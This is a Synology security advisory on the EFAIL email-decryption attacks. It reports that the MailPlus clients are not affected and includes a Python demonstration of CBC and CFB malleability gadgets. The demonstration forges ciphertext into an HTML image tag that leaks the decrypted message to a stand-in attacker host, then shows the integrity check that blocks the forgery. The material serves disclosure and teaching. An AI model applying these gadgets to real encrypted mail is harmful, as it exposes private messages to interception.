Synology-SA-18:22 EFAIL

Publish Time: 2018-05-15 19:16:15 UTC+8

Last Updated: 2019-12-24 14:27:10 UTC+8

Severity: Not affected

Status: Resolved

Abstract

The EFAIL attacks allow a remote attacker who has obtained an OpenPGP- or S/MIME-encrypted email to recover its plaintext. The attacker modifies the ciphertext (a CFB or CBC malleability gadget, see Detail below) so that, once the victim's client decrypts the message and renders the result as HTML, the decrypted text is sent to an attacker-controlled server, for example as part of an image URL.

Synology products are not affected because MailPlus, Android MailPlus, and iOS MailPlus do not render HTML for OpenPGP or S/MIME messages, so the exfiltration channel the attack depends on (rendering of attacker-injected HTML inside the decrypted message) is not available.

Affected Products

Product           Severity      Fixed Release Availability
MailPlus          Not affected  N/A
Android MailPlus  Not affected  N/A
iOS MailPlus      Not affected  N/A

Mitigation

None required; the listed products are not affected.

Detail

  • CVE-2017-17688

    • Severity: Moderate
    • CVSS3 Base Score: 5.3
    • CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    • ** DISPUTED ** The OpenPGP specification allows a Cipher Feedback Mode (CFB) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL. NOTE: third parties report that this is a problem in applications that mishandle the Modification Detection Code (MDC) feature or accept an obsolete packet type, not a problem in the OpenPGP specification.
  • CVE-2017-17689

    • Severity: Moderate
    • CVSS3 Base Score: 5.3
    • CVSS3 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N
    • The S/MIME specification allows a Cipher Block Chaining (CBC) malleability-gadget attack that can indirectly lead to plaintext exfiltration, aka EFAIL.
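The two CVE entries above describe the same construction in two modes of operation. The following is an added example, not Synology's code and not the EFAIL authors' code, that shows the CFB gadget (OpenPGP, CVE-2017-17688) and the CBC gadget (S/MIME, CVE-2017-17689) side by side, the HTML-rendering step that turns a garbled decryption into an outgoing request, and the integrity check whose mishandling the NOTE on CVE-2017-17688 refers to. Assumptions: the block cipher is a stand-in 4-round Feistel network built on HMAC-SHA256 (used instead of AES so the example needs only the standard library; the gadgets depend on the mode, not the cipher), the key, IV and message are constructed sample values, the attacker host `bad` is hypothetical, and an HMAC over the ciphertext stands in for OpenPGP's MDC or an AEAD tag.

```python
# Added example (not Synology's or the EFAIL authors' code): the CBC (S/MIME) and CFB
# (OpenPGP) malleability gadgets behind EFAIL, the HTML-rendering step that turns them into
# exfiltration, and the integrity check the CVE note refers to. Stdlib only; sample data constructed.
import hashlib
import hmac

BLOCK, ROUNDS = 16, 4

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

# Stand-in 128-bit block cipher (4-round Feistel over HMAC-SHA256) used instead of AES so this runs offline.
def _f(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in range(ROUNDS):
        l, r = r, xor(l, _f(key, rnd, r))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        l, r = xor(r, _f(key, rnd, l)), l
    return l + r

def blocks(data):
    return [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]

def pad(data):  # PKCS#7, so both modes see whole blocks
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

# CBC (S/MIME): C_i = E(P_i ^ C_{i-1}), so P_i = D(C_i) ^ C_{i-1}.
def cbc_encrypt(key, iv, pt):
    out = [iv]
    for p in blocks(pad(pt)):
        out.append(block_encrypt(key, xor(p, out[-1])))
    return b"".join(out)

def cbc_decrypt(key, ct):
    c = blocks(ct)
    return b"".join(xor(block_decrypt(key, c[i]), c[i - 1]) for i in range(1, len(c)))

# CFB (OpenPGP): C_i = E(C_{i-1}) ^ P_i, so P_i = E(C_{i-1}) ^ C_i.
def cfb_encrypt(key, iv, pt):
    out = [iv]
    for p in blocks(pad(pt)):
        out.append(xor(block_encrypt(key, out[-1]), p))
    return b"".join(out)

def cfb_decrypt(key, ct):
    c = blocks(ct)
    return b"".join(xor(block_encrypt(key, c[i - 1]), c[i]) for i in range(1, len(c)))

# Gadgets: the attacker holds the ciphertext and knows the first plaintext block (MIME
# headers are predictable) but not the key; each returns two blocks decrypting to (garbage, X).
def cbc_gadget(ct, known_p1, chosen):
    c0, c1 = blocks(ct)[:2]
    d_c1 = xor(known_p1, c0)            # D(C_1) = P_1 ^ C_0
    return xor(d_c1, chosen) + c1       # C_1 then decrypts to D(C_1) ^ (D(C_1) ^ X) = X

def cfb_gadget(ct, known_p1, chosen):
    c0, c1 = blocks(ct)[:2]
    keystream = xor(known_p1, c1)       # E(C_0) = P_1 ^ C_1
    return c0 + xor(keystream, chosen)  # second block decrypts to E(C_0) ^ (E(C_0) ^ X) = X

OPEN = b'<img src="//bad/'   # exactly one block: opens the exfiltration URL (hypothetical host)
CLOSE = b'">' + b" " * 14    # exactly one block: closes it

def forge(ct, known_p1, gadget):
    # Decrypts, in either mode, to OPEN | garbage | P_1..P_n | garbage | CLOSE, so the
    # whole message becomes the path of an image URL the client will request.
    return gadget(ct, known_p1, OPEN) + ct + gadget(ct, known_p1, CLOSE)

def rendered_src(html):  # URL an HTML-rendering client would fetch (src up to next quote)
    i = html.find(b'src="') + 5
    return html[i:html.find(b'"', i)] if i >= 5 and html.find(b'"', i) >= 0 else None

def integrity_tag(mac_key, ct):  # stand-in for the MDC / AEAD check a client must enforce
    return hmac.new(mac_key, ct, hashlib.sha256).digest()

KEY, MAC_KEY, IV = b"k" * 16, b"m" * 16, b"\x01" * 16   # constructed, fixed for repeatability
MESSAGE = b"Content-Type: text/plain\r\n\r\nWire 4000 EUR to account 12345 today."
KNOWN_P1 = MESSAGE[:BLOCK]   # "Content-Type: te", guessable without the key
MODES = {"cbc": (cbc_encrypt, cbc_decrypt, cbc_gadget), "cfb": (cfb_encrypt, cfb_decrypt, cfb_gadget)}

def demo(mode):
    enc, dec, gadget = MODES[mode]
    ct = enc(KEY, IV, MESSAGE)
    tag, forged = integrity_tag(MAC_KEY, ct), forge(ct, KNOWN_P1, gadget)
    shown = dec(KEY, forged)
    return {"plain": dec(KEY, ct), "shown": shown, "url": rendered_src(shown),
            "original_ok": hmac.compare_digest(integrity_tag(MAC_KEY, ct), tag),
            "forged_ok": hmac.compare_digest(integrity_tag(MAC_KEY, forged), tag)}

if __name__ == "__main__":
    for mode in MODES:
        print(mode, "client would fetch:", demo(mode)["url"])
```

Two things are worth noticing when running it. First, each gadget costs one garbage block (the block whose ciphertext neighbour was replaced); in this toy layout the garbage lands inside the URL, and if its 16 random bytes happen to contain a double quote the URL is cut short, which is why the real attack picks gadget positions so that garbage falls where the HTML parser tolerates it. Second, the forged message fails the integrity check and the client never reaches the rendering step, while a client that ignores that failure, or, as Synology's clients do, never renders HTML from an OpenPGP or S/MIME body at all, gives the attacker nothing to collect.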

Reference

Revision

Revision  Date        Description
1         2018-05-15  Initial public release.
2         2019-12-24  Disclosed vulnerability details.